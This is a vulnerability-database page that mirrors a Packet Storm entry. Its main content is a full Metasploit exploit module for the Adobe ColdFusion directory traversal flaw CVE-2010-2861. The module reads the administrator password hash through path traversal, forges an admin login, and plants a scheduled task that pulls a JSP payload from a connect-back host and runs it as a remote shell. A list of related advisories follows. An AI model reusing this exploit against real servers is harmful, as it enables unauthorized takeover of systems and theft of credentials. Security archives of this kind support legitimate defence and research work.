Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormWebDEViLPACKETSTORM:99380
HistoryMar 16, 2011 - 12:00 a.m.

Adobe ColdFusion - Directory Traversal

2011-03-1600:00:00
webDEViL
packetstormsecurity.com
120

0.972 High

EPSS

Percentile

99.8%

JSON
`##  
# $Id: coldfusion_traversal.rb 11986 2011-03-16 10:15:54Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Adobe ColdFusion - Directory Traversal',  
'Description' => %q{  
This module exploits a directory traversal bug in Adobe ColdFusion.  
By reading the password.properties a user can login using the encrypted   
password itself. This should work on version 8 and below.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'webDEViL' ],  
'Version' => '$Revision: 11986 $',  
'References' =>  
[  
[ 'CVE', '2010-2861' ],  
[ 'OSVDB', '67047' ],  
[ 'URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07' ],   
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-18.html' ],   
],  
'Privileged' => true,  
'Platform' => ['linux','windows'],  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Targets' =>  
[  
[ 'Universal',  
{  
'Arch' => ARCH_JAVA,  
'Payload' => 'java'  
}  
],  
],  
  
'DisclosureDate' => 'Aug 25 2010',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),  
OptString.new('URL', [ true, 'Administrator Directory', '/CFIDE/administrator/' ]),  
OptString.new('CBIP', [ true, 'Connect Back IP (even when not using reverse shell)', nil ]),  
OptString.new('TRAV', [ false, 'Location of the password.properties file eg. ../../../../ColdFusion8/lib/password.properties%00en', nil ]),   
], self.class)  
  
end  
  
def exploit  
  
ip = datastore['RHOST']  
url = datastore['URL']+"enter.cfm"  
locale = "?locale="  
trav = datastore['TRAV'] || "../../../../../../../../../../../../../../../../../../../../../../lib/password.properties%00en"  
datastore['JSP'] = "wD-"+rand_text_alphanumeric(6)+".jsp"  
datastore['URIPATH'] = rand_text_alphanumeric(6)  
  
print_status("Trying to acheive Directory Traversal...")  
while trav.match(/..\//im)  
res = send_request_raw({  
'uri' => url+locale+trav,  
'method' => 'GET',  
'headers' =>  
{  
'Connection' => "keep-alive",  
'Accept-Encoding' => "zip,deflate",  
},  
}, -1)  
  
if (res.nil?)  
print_error("no response for #{ip}:#{rport} #{url}")  
elsif (res.code == 200)  
#print_error("#{res.body}")#debug  
  
if match = res.body.match(/([0-9A-F]{40})/im);  
caphash = $1  
print_status("URL: #{ip}#{url}?locale=#{trav}")  
print_status("Admin Hash: " + caphash)  
break  
else  
#select(nil, nil, nil, 3)  
trav=trav[3..-1]  
print_status("Trav:"+trav)  
  
end  
  
else  
''  
end  
end  
  
if caphash.nil?  
print_error("Could not determine location of password.properties file, Set TRAV option manually")  
print_error("OR ColdFusion is not vulnerable")  
return  
end  
  
keyz = Time.now.to_i.to_s+"123"  
print_status("Time: "+ keyz)  
loghash= OpenSSL::HMAC.digest(OpenSSL::Digest::Digest.new('sha1'), keyz, caphash).unpack('H*')[0].upcase  
print_status("Login Hash: "+loghash)  
  
params = 'cfadminPassword='+loghash  
params << '&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F&'  
params << 'salt='+keyz  
params << '&submit=Login'  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => url,  
'data' => params  
})  
  
if (res)  
#print_status("Me want Cookie: "+ res.headers['Set-Cookie'])  
if (res.headers['Set-Cookie'].match(/([A-Za-z0-9]{20,200})/im);)  
session = $1  
print_status("Cookie: #{session}")  
else  
print_error("Error retrieving cookie!")  
end  
else  
print_error("No response received while logging in.")  
end  
  
print_status("Attempting to automatically detect the platform...")  
##AUTO_DETECT START  
path = datastore['URL'] + 'settings/mappings.cfm'  
res = send_request_raw(  
{  
'uri' => path,  
'headers' =>  
{  
'Cookie' => "CFAUTHORIZATION_cfadmin=#{session}"  
}  
}, 20)  
  
if (not res) or (res.code != 200)  
print_error("Failed: Error requesting #{path}")  
return nil  
end  
  
if (res.body.match(/.*td *>(.*CFIDE&nbsp;)/im);)  
os = $1  
os.match(/<td [^>]*?>(.*)&nbsp/im);  
os1 =$1  
os1 = os1.gsub("\t", '')  
os1 = os1.gsub("\r\n", '')  
  
if (os1 =~ /:/i) #haha ;)  
print_status('OS: Windows')  
datastore['SHELL'] = 'cmd.exe'  
os1=os1+"\\"   
else #(os1 =~ /\//i)  
print_status('OS: Linux')  
datastore['SHELL'] = '/bin/sh'  
os1=os1+"/"  
end  
print_status("Web Directory:"+os1)  
end  
  
##AUTO_DETECT END  
  
res = send_request_raw(  
{  
'uri' => "/CFIDE/administrator/scheduler/scheduleedit.cfm?submit=Schedule+New+Task",  
'method' => 'GET',  
'headers' =>  
{  
'Cookie' => "CFAUTHORIZATION_cfadmin=#{session}",  
}  
}, 25)  
  
if (res.body.match(/<input name="StartTimeOnce".*?value="(.*?)">/im);)  
start_time = $1  
end  
  
if (res.body.match(/<input name="Start_Date".*?value="(.*?)" id="Start_Date">/im);)   
start_date = $1  
end  
#else FAIL!  
comb = start_date + start_time  
fmt = "%b %d, %Y%I:%M %p"  
  
comb = ((DateTime.strptime(comb,fmt)).advance :minutes =>-19)  
t = comb.strftime("%b %d, %Y")  
t1 = comb.strftime("%I:%M %p")  
#t=(Time.now).strftime("%b %d, %Y") #can't use local time  
#t1=(Time.now + 5).strftime("%I:%M:%S %p")  
params = 'TaskName=wD-'+rand_text_alphanumeric(6)  
params << "&Start_Date=#{t}" #Mar+12%2C+2011  
params << '&End_Date=&ScheduleType=Once'  
params << "&StartTimeOnce=#{t1}" #6%3A40+PM  
params << ' &Interval=Daily&StartTimeDWM=&customInterval_hour=0&customInterval_min=0&customInterval_sec=0&CustomStartTime=&CustomEndTime=&Operation=HTTPRequest'  
params << '&ScheduledURL=http%3A%2F%2F'+datastore['CBIP']+":"+datastore['SRVPORT']+"/"+datastore['URIPATH']  
params << '&Username=&Password=&Request_Time_out=&proxy_server=&http_proxy_port=&publish=1'  
params << '&publish_file='+os1+datastore['JSP']  
params << '&adminsubmit=Submit&taskNameOrig='  
  
res = send_request_raw(  
{  
'uri' => "/CFIDE/administrator/scheduler/scheduleedit.cfm",  
'method' => 'POST',  
'data' => params,  
'headers' =>  
{  
'Content-Type' => 'application/x-www-form-urlencoded',  
'Content-Length' => params.length,  
'Cookie' => "CFAUTHORIZATION_cfadmin=#{session}",  
}  
}, 25)  
#print_error("#{res.body}")  
super  
end   
  
def on_request_uri(cli, request)  
p = regenerate_payload(cli)  
#print_status("SHELL set to #{datastore['SHELL']}")  
#print_status((p.encoded).to_s)  
  
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response(cli, p.encoded, { 'Content-Type' => 'text/html' })  
  
res = send_request_raw(  
{  
'uri' => "/CFIDE/"+datastore['JSP'],  
'method' => 'GET',  
}, 25)  
# Handle the payload  
handler(cli)  
end  
end  
`

Related

checkpoint_advisories 1
exploitpack 1
seebug 2
attackerkb 1
cisa_kev 1
prion 2
securityvulns 1
metasploit 1
cve 2
nuclei 1
openvas 2
nessus 1
canvas 1
packetstorm 1
exploitdb 1
thn 1
threatpost 1
nmap 1
checkpoint_advisories
checkpoint_advisories
Adobe ColdFusion Directory Traversal (APSB10-18; CVE-2010-2861)
2010-09-05 00:00:00
exploitpack
exploitpack
Adobe ColdFusion - Directory Traversal
2010-08-14 00:00:00
seebug
seebug
Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)
2014-07-01 00:00:00
Adobe ColdFusion Directory Traversal Vulnerability
2010-09-30 00:00:00
attackerkb
attackerkb
CVE-2010-2861
2010-08-11 00:00:00
cisa_kev
cisa_kev
Adobe ColdFusion Directory Traversal Vulnerability
2022-03-25 00:00:00
prion
prion
Directory traversal
2010-08-11 18:47:00
Design/Logic Flaw
2013-09-20 16:55:00
securityvulns
securityvulns
PR10-07: Unauthenticated File Retrieval &#40;traversal&#41; within ColdFusion administration console
2010-08-12 00:00:00
metasploit
metasploit
ColdFusion Server Check
2010-09-01 01:57:22
cve
cve
CVE-2010-2861
2010-08-11 18:47:00
CVE-2010-5290
2013-09-20 16:55:00
nuclei
nuclei
Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
2021-03-01 04:26:27
openvas
openvas
Adobe ColdFusion Directory Traversal Vulnerability
2010-09-02 00:00:00
Adobe ColdFusion Directory Traversal Vulnerability (APSB10-18)
2010-09-02 00:00:00
nessus
nessus
Adobe ColdFusion 'locale' Parameter Directory Traversal
2010-08-16 00:00:00
canvas
canvas
Immunity Canvas: CF_DIRECTORY_TRAVERSAL
2010-08-11 18:47:00
packetstorm
packetstorm
Adobe ColdFusion Directory Traversal
2010-08-17 00:00:00
exploitdb
exploitdb
Adobe ColdFusion - Directory Traversal
2010-08-14 00:00:00
thn
thn
Cring Ransomware Gang Exploits 11-Year-Old ColdFusion Bug
2021-09-21 12:27:00
threatpost
threatpost
12 New Flaws Used in Ransomware Attacks in Q3
2021-11-09 18:06:33
nmap
nmap
http-vuln-cve2010-2861 NSE Script
2012-02-19 14:40:01

0.972 High

EPSS

Percentile

99.8%

JSON
Related for PACKETSTORM:99380
checkpoint_advisories1exploitpack1seebug2attackerkb1cisa_kev1prion2securityvulns1metasploit1cve2nuclei1openvas2nessus1canvas1packetstorm1exploitdb1thn1threatpost1nmap1